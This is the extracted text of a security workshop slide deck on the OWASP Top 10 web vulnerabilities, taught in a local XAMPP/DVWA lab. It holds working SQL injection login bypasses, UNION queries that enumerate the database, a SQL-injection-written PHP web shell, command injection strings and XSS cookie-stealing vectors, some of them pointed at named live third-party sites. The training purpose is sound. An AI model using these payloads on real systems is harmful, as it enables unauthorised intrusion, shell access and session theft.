Mission :- Understand / Learn / Practice OWASP Web Security Vulnerabilities https://www.owasp.org/index.php/Top102013-Top_10 In this session, Attendees will perform hands-on exercises to get a better understanding of the OWASP top ten security threats.

1.
TOP 10 WEB APPLICATION SECURITY
HAZARDS
@
by Abhinav Sejpal
Null - Humla Session

2. THOUGHT WORKS - BANGALORE

3.
WHO AM I
I' m Next-Gen Exploratory Testy
Student of Information Security field
Researcher & Reader in free time
Member of
Crowd Tester (AKA. Bug bounty Hunter)
Proficient at Functional, Usability , Accessibility & Compatibility Testing
Love to develop nasty code & Hack it :)
Works as Quality Analyst at
AKA. Bug Wrangler
Null Open Security Co mmunity
passbrains.com

4. DISCLAIMER
This presentation is intended for educational purpose only and I cannot be held liable for
any kind of damages done, whatsoever to your machine, or any other damages.
Don't try this attack on any other system without having context knowledge or permission,
this may harm someone directly or indirectly.
Feel free to use this presentation for practice or education purpose.
^ I hope - You gotcha ^

5. ~ WE AREN'T GOING TO DO THIS ~
So, feel free to stop when you have a doubt!
Are you Ready to Rock ???

6. AGENDA
Why Web Application Security Testing ?
Myths, you'll hear - but Do you believe ?
What is OWASP, what do they provide ?
OWASP Web Top - 10 Publication
How web works ?
Proof of Concept for Top - 10 attack
Self exploratory exercise on Top - 10
Learn + Hack
Q & A

7. FOR SOCIAL MEDIA
Twitter handle
@ @null0x00 Abhinav_Sejpal
Hashtag for this session
# #Nullhumla nullblr

8. HUMLA
MEANS 'ATTACK' IN HINDI

13. OBJECTIVES FOR THIS SESSION
BUILD SECURITY AWARENESS FOR WEB
APPLICATION
GET TO KNOW ATTACK METHOD OF HACKERS
LEARN WAY TO DISCOVER SECURITY
VULNERABILITIES
LEARN BASIC OF SECURE WEB APPLICATION VIA
OWASP TOP 10

14. WHY WEB APPLICATION SECURITY TESTING?

15. HERE IS THE ANSWER !
Increases vulnerability to attacks
Damage to your reputation and brand value
Loss of customer confidence & potential business
Disturbance to your online means of revenue collection
Legal liability
Website downtime, loss of time & resources in mitigating the damage
Additional costs and regression testing associated with securing web
applications for future attacks
And much more! Boom - Isn't it?
The average loss reported in the 2007 CSI Computer Crime and Security
Survey was $350,424.

16. COMPROMISED SCENARIO

17. MYTHS, YOU'LL HEAR - BUT DO YOU BELIEVE?

18. DON'T BELIEVE IN MYTHS!
Secure Socket Layer (SSL / HTTPS) protects my website.
Buy this one tool and it will solve all my problems.
We don’t have anything worth to be stolen.
{Java - Insert Name here} is a secured language.
We can't possibly be a target.
We never had any data breaches on our organization and we are
safe. Our technical team is much smart. #facepalm
We have a firewall setup (WAF) - Nothing to worry! You wish
You're safer on a mobile site as compared to a desktop.
Can come up with umpteen more!

19. SO, DO YOU ALL AGREE THAT
WEB APPLICATION SECURITY IS
ESSENTIAL?

20. MY OPINION
SECURITY TESTING IS ALWAYS A RACE BETWEEN HACKERS AND THE
SECURITY COMPANIES TO GET ONE STEP AHEAD OF EACH OTHER.

21. RISK MANAGEMENT
THE WEB WILL NEVER BE 100 PER CENT SECURE, BUT WITH GOOD
DUE DILIGENCE, IT CAN BE ONE OF THE SAFEST PLACES ON EARTH TO
DO BUSINESS.
AFTER ALL, OUR PRIMARY CONCERN IS SEAMLESS BUSINESS.
There we stand ^ Web application Security Ninja's ^

22. :D
WHAT IS OWASP?
O verly
Wonderful
Awesome
Super
People !

23. OWASP -THE OPEN WEB
APPLICATION SECURITY PROJECT
(OWASP) is a 501c3 not for-profit worldwide charitable organization
Everyone is free to participate in OWASP and all the materials are
available under a free and open software license
It provides a free access to community resources and events:
Publications, Articles
Standard Testing and Training Software
Local Chapters & Mailings List
World-wide conferences

24. OWASP ROLE
Make application security visible, so that people and
organizations can make informed decisions about true
application security risk!

25. What do we mean by OWASP Top 10 Web Application
Security Vulnerabilities ?
A list of the 10 most severe security issues f requently occur in
web applications.
It’s a list of vulnerabilities that require immediate remediation.
Existing code should be checked for these vulnerabilities, as these
flaws are effectively targeted by attackers.
New updates on tithe year (third year sequence).
Strong push to present as a standard

26. Are we sure that this survey results are trustworthy ?
This wiki is not a standard or a policy. It provides a brief
description of the vulnerabilities, and methods of
This is nothing but
Top ten web application security hazards
recommended by OWASP Survey.
^ Myth Involved Here^

27. prevention.
LET'S BEGIN OUR JOURNEY
OF
TOP 10 WEB APPLICATION SECURITY
HAZARDS
I don't want to showcase top ten - let's start with baby
steps

28. How Web works ?

29. HTTP HEADER FLOW

30. Tamper Google HTTP request!

32. I have questions?
Does the user input go through any validation at user’s web browser?
Does Business Logic verify the user inputs at server side?
If your answer is 'No', then be ready for the 'Nightmare'

33. Conclusion
Modern websites rely on user input for everything.
They are basically applications which expect various kinds
of inputs coming from users to function a certain way.
~ Courtesy ~@makash

34. Could be Command / SQL statement
I AM THAT BAD INPUT
'INJECTION '
OWASP #A1

35. WHAT IS SQL ?
SQL stands for Structured Query Language.
Execute queries against a database
Retrieve data from a database
Insert new records in a database
Delete records from a database
In short, All DB operations :)

36. USER INPUT? AHA

37. WHAT IF THIS WORKS? UMM

38. IT'S ME - SQL INJECTION
PEOPLE CALL ME SQLI ALSO
'YES' - I AM A BOTTLENECK FOR DEVELOPERS SINCE MANY YEARS
Smart Geeks opt for me along with user inputs & perform attack.

39. PREVIOUS ATTACKS VIA SQLI
SQL injection has been responsible for 83% of all
successful hacking-related data
breaches, from 2005-2011.
(Source: Privacyrights.org)
Automation Infects 100,000s: In 2008,
SQLi attacks became automated via the
use of botnets. Mass website infection
incidents include 500,000 reported in
2008; 210,000 in 2009; 500,000 in 2010 and
380,000 in 2011.

40. SQLI FACTS
Dominant Source of Attack: 97
percent
of data breaches worldwide are due
to
SQL injection.
(Source: National Fraud Authority UK)
Web Application Risk: SQL Injection was the leading
Web application risk of 2011. It ranks as one
of the most common software vulnerabilities in
survey after survey(Source: Trustwave)

41. CAKE PHP
Struts 2
Spring
GWT (Google Web toolkit)
MYTHS
SQLi is old days' problem - I shouldn't worry about this.
^^
I am using Java / PHP / RUBY / ASP modern days'
framework.

42. ESAPI

43. Latest SQL Injection Campaign Infects 1 Million Web Pages

44. Yahoo Hit By SQL Injection Attack

45. SQL INJECTION FLAW IN WALL STREET
JOURNAL DATABASE LED TO BREACH

46. SQL INJECTION ISN'T GOING ANY WHERE <3

47. for:
Setup the Test Lab
Install XAMPP
Acronym
X (to be read as "cross", meaning )cross-platform
Apache HTTP Server
MySQL
PHP
Perl

48. TARGETED APPLICATION
Client Side language : HTML & Javascript
Server side Language: PHP
DB : MYSQL
Why PHP ? - Any answer Here?
Why MySQL? MySQL is Girlfriend of PHP <3

49. PHP IS USED BY 82.2% OF ALL THE WEBSITES AS SERVER-SIDE
PROGRAMMING LANGUAGE.
http://w3techs.com/technologies/overview/programming_lang

50. PHP: 244M SITES
2.1M IP ADDRESSES

51. 2013 Server-side Programming Language of the Year
Don't Mind Power of PHP > Facebook & yahoo
http://w3techs.com/blog/entry/web_technologies_of_the_year

52. ERROR BASED SQLI
Demo
http://sqli.cyberwebdeveloper.com/index.php

53. CONCEPT
Basic SQL query Login page :-
SELECT * FROM users where username="username" AND
password = "pass"
Basic PHP statement for Login page :-
SELECT * FROM users where username='".$username."' AND
password = '".md5($pass)."'"
*Md5() method is used to encrypt the password.
* Demo at SQL *

54. CHEAT SHEET
#Attack - 1
SELECT * FROM `users` WHERE `username` ='admin' or
'1'='1' and password ='I dont know'
Injection code :-
admin' or '1'='1

55. WHY ?
Attack 1 is rely on 'User name'
SELECT * FROM `users` WHERE `username` =' admin' or
'1'='1 ' and password ='I dont know'
Can't perform this attack on password field due to
encryption.
User name = anything' or '1' ='1
password = anything' or '1'='1

56. * known User name is mandatory Here*

57. LEARNING FROM THE ATTACK 1
User name is known i.e. 'admin'
Append SQL statement with user name
<It simply works>
But you can't perform this attack without user name

59. COMMENTS BASED SQLI
http://dev.mysql.com/doc/refman/5.1/en/comments.html
# : Single line comment
"-- " : Sequence to end of line comment
/* Sequence to following block comment*/

60. CONCEPT
Basic SQL query Login page :-
SELECT * FROM users where username="username" AND
password = "pass"
What if - I insert comments in first attack
SELECT * FROM users where username=" admin" or '1' ='1'
# AND password = "pass"
<< AND password = " pass" >> doesn't execute all

61. IF YOU GET ME - ATTACK DOESN'T
REQUIRE USER NAME NOW
SELECT * FROM users where username=" admin" or '1' ='1'
# AND password = "pass"
SQL statement will be always true due '1' = '1' thus doesn't
matter, you are knowing user name or not.
Yes - I am done. but what if ' #' is not valid input?

62. (-- ) WORKS FOR YOU BUDDY!
* --(space) is syntax
admin' or '1' = '1' --: False
admin' or '1' = '1' -- : True
Mostly people forget to add space, so I use below vector
admin' or '1' = '1' -- space + any one character
E.G. > admin' or '1' = '1' -- Sandy

63. SO, WHAT DO YOU THINK,
SQL IS ALL ABOUT 1=1?
ssshhh - Do you hear that? - NO

64. DUMP SENSITIVE DB INFO
* Identify column gets selected.
* Identify the data set which value will be displayed.
a%' union select 1,2,3,4,5 from users #
a%' union select 1 ,@@datadir,2,3,4 from users #
a%' union select 1 ,@@version,3,4,5 from users #

65. DATABASE ENUMERATION
a%' union select 1, table_schema,2,3,4 from
information_schema.tables #

66. TABLE ENUMERATION
a%' union select 1, table_schema, table_name,3,4 from
information_schema.tables #
a%' union select 1, table_schema, table_name,3,4 from
information_schema.tables where
table_schema='sqlhumla'#

67. - Text File Writing
SHELL INJECTION
Into outfile
I want to save a MySQL query result to a text file like this:
<span class="kwd">SELECT</span>
<span class="pln"></span>
<span class="pun">*</span>
<span class="pln"></span>
<span class="kwd">FROM</span>
<span class="pln"> orders </span>
<span class="kwd">INTO</span>
<span class="pln"> OUTFILE </span>
<span class="str">'/data.txt'</span>

68. Can we append the same logic with our injection?
user=frodo' into outfile 'test.txt'; -- comments

69. SHELL INJECTION
'Hello world' PHP File Writing at current folder
=FRODO' INTO OUTFILE "../../HTDOCS/XAMPP/SQLI/TEST.TXT"; - A
Select * from users where username = 'frodo' union select
1,2,3," <?php echo "Hello World"; ?> ",5 from users into
outfile '../../htdocs/xampp/sqli/ shellTest.php'; -- a

70. PHP SHELL CODE
<?php $output = shell_exec('Test'); echo
'<pre>$output</pre>'; ?>
Append the same as SQL injection
user=frodo' union select 1,2,3, " <?php $output =
shell_exec('test'); echo '<pre>$output</pre>'; ?>", 5 from
users into outfile '../../htdocs/xampp/sqli/shell.php'; -- a

71. THERE YOU ARE!
http://127.0.0.1/xampp/Sqli/shell.php?test=dir

72. PLAY GROUND
DAMN VULNERABLE WEB APP
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web
application that is damn vulnerable. Its main goals are to be
an aid for security professionals to test their skills and tools
in a legal environment.
http://www.dvwa.co.uk/
https://github.com/RandomStorm/DVWA

73. COMMAND INJECTION
127.0.0.1 && DIR
OWASP #A1

74. UNDERSTAND THE CODE

75. ANOTHER VECTOR
1 | DIR C:

76. BAD CODE WITH SUBSTITUTIONS

77. AUTOMATION
TOOLS / FRAMEWORK FOR POC
Metasploit
SQL MAP
Havij
Sql inject Me(add-on)
Burp suit
SQL Inject or many....!

78. XXS
CROSS-SITE SCRIPTING
"XSS enables attackers to inject client-side
script into web pages viewed by other users".
OWASP #A3
Wikipedia says

79. WHAT IS XSS ?
http://appsandsecurity.blogsplot.de/2012/11/is-xss-solved.html
OWASP says "Cross-Site Scripting (XSS) attacks are a type of
injection, in which malicious scripts are injected into
otherwise benign and trusted web sites.
https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29

80. SO WHERE DOES XSS STAND?
ACCORDING TO WHITE HAT, 53% WEB APPLICATIONS HAVE XSS
VULNERABILITY.
https://www.whitehatsec.com/assets/WPstatsReport_052013.p

81. DO YOU KNOW,
81 OUT OF 100 POPULAR MOBILE
WEBSITES ARE VULNERABLE TO
XSS?
http://www.nds.rub.de/media/nds/veroeffentlichungen/2013/08

82. STATS FROM GOOGLE'S
VULNERABILITY REWARD PROGRAM
http://www.nilsjuenemann.de/2012/12/news-about-
googles-vulnerability-reward.html

83. INPUT - OUTPUT CONTEXT

84. http://slides.com/mscasharjaved/on-breaking-php-based-cross-site-scripting-protections-in-the-wild#/61

85. http://slides.com/mscasharjaved/on-breaking-php-based-cross-site-scripting-protections-in-the-wild#/63

86. LIFE CYCLE OF REFLECTED XSS

87. AND I'M YOUR XSS!
</script> <script> confirm(1); </script>

88. LIVE
http://tvfortesters.com/?s="><script>
alert(document.cookie); </script>
I f you get me, it is Reflected XSS

89. Challenge #1
http://demo.testfire.net/
Copyright © 2014, IBM Corporation

90. (AKA NON-PERSISTENT)REFLECTED XSS
Reflected XSS occurs when user input is immediately
returned by a web application in an error message, search
result, or any other response that includes some or all of the
input provided by the user as part of the request, without
that data being made safe to render in the browser, and
without permanently storing the user provided data.
https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting

91. CAN WE SAVE JS CODE IN DB?
What if so ? :D

92. LIFE CYCLE OF STORED XSS

93. I T IS STORED XSS
Live
http://mmqb.si.com/2014/08/20/san-francisco-49ers-new-stadium-training-camp-thoughts-
peter-king-video/#mmqb_livefyre_comm_bellow/autostart/
Vector : Under BIO :- </p></script> <img src=1
onerror=alert(document.cookie);>

94. STORED XSS
Stored XSS generally occurs when user input is stored on the
target server, such as in a database, in a message forum,
visitor log, comment field, etc. And then a victim is able to
retrieve the stored data from the web application.

95. #XSS WRITE-UP BY ASHAR
http://www.scribd.com/doc/210121412/XSS-is-not-going-
anywhere

96. OH NO, THERE IS AN XSS IN YOUR JS
http://127.0.0.1/xampp/DOM%20XSS/domxss_demo_1.html#
<img src=nonexistent onerror=alert(1)>

97. IT'S DOM BASED XSS
Directory Object Model

98. Understand the Logic
When Source gets synced?
An attacker may append a JS to the affected page URL
which would, when executed, display the alert box.
Impact would show only on - Client side JS

99. IF YOU WANT TO KNOW MORE
ABOUT DOM BASED XSS THEN
PLEASE BUG " "@LAVAKUMARK
More Info at : https://ironwasp.org/

100. <shhh - Very low priority but should be acknowledged >
NO MORE TALK ABOUT SELF XSS

101. But there is a lot to learn :D

102. Am I Vulnerable To 'Broken Authentication &
Session Management'?
A2 - OWASP TOP 10

105. So, Let's Learn about Web App DB structure
Passwords are stored in plain text.
oh really -- ':(
OWASP #A6

106. Password is protected, when stored using encryption
algorithm. Are you sure?
http://www.md5online.org/

107. YOU MAY ALSO TRY OUT HASH BUT PASSWORD SALT IS A
RECOMMENDED SOLUTION SO FAR.
P ASSWORD POLICY SHOULD BE APPLIED NICELY AND SHOULD NOT BE WEAKER.
-- * --
SECURITY & BUSINESS LOGIC SHOULD BE APPLIED FOR CHANGING PASSWORD. CHANGE
PASSWORD DOESN'T ASK FOR CURRENT PASSWORD - LOL

109. IN-SECURED SESSION-ID
Cookies Flag HTTP ONLY
Secure flag would be complimentary

110. TAKE AWAY

111. AVOIDING INSECURE DIRECT OBJECT REFERENCES
OWASP #A4

112. URLS' PATTERN

113. Demo #1
Tamper the ID parameter
http://127.0.0.1/xampp/sqli/secondorder_changepass.php

114. ENUMERATION USING PARAMETER
LIVE
https://profile.utest.com/67797
https://profile.utest.com/200 -- N

115. MISSING FUNCTION LEVEL ACCESS CONTROL
OWASP #A7

116. CONCEPT

117. LIVE
HTTP://STEPINFORUM.ORG/MAILERS2014/
http://demo.testfire.net/pr/

118. Source: https://www.aspectsecurity.com/uploads/downloads/2012/03/Aspect-Security-The-Unfortunate-Reality-of-Insecure-
Libraries.pdf

119. USING KNOWN VULNERABLE
COMPONENTS
OWASP #A9

120. ~ PROTECTION AGAINST ~

121. A6 – Sensitive Data Exposure

122. BASIC UNDERSTANDING

123. HTTP://SLIDES.COM/ABHINAVSEJPAL/TOP-10-WEB-APPLICATION-SECURITY-HAZARDS#/89

124. OWASP #A8 – Avoiding CSRF Flaws

125. CSRF

127. CSRF DEMO

128. UNDERSTAND CSRF FIX

129. SECURITY
MISCONFIGURATION

130. OWASP -#A5

131. if you are planning to host your own server
this talk matters for you
"SECURING A LINUX WEB SERVER IN 10 STEP S"
BY A KASH MAHAJAN
https://www.youtube.com/watch?v=ort9qxzu3h0

132. YES - I'M DONE!
Feel free to write me at bug.wrangler at outlook.com

133. GOOD READS
https://www.owasp.org/
http://ha.ckers.org
http://hakipedia.com
http://www.fiddlerontheroot.com
http://www.garage4hackers.com
http://www.computersecuritystudent.com/
-- Explore Google Darling > Search 'OWASP TOP Ten' --

134. WE NEED YOU!
Attend Null Meets-up & give presentations.
Share your ideas & leanings.
Talk to our community champions & gain from leanings.
Your feedback helps us to build a good community.
Looking forward to your ongoing support.
HTTP://NULL.CO.IN/
Say 'Hello' @null0x00

135. - Twitter Folks -
@ , @ , @
@ , @ , @
@ ,
#Nullblr Leads & Champions
Big thank you to @ ,@ & you All.
CREDITS
riyazwalikar anantshri makash
TroyHunt yog3sharma soaj1664ashar
@ MohammedAImran ru94mb
@ LAVAKUMARK , @1_NEHA
null0x00 JubbaOnJeans

136. THANK YOU!
KEEP THE SECURITY ANTE UP.

137. https://slides.com/abhinavsejpal/top-10-web-application-
security-hazards
LICENSE AND COPYRIGHTS
Copyrights 2013-2014 Abhinav Sejpal
-----
( CC BY-NC-ND 3.0)
Attribution-NonCommercial-NoDerivs 3.0 Unported
Dedicated to my lovely daddy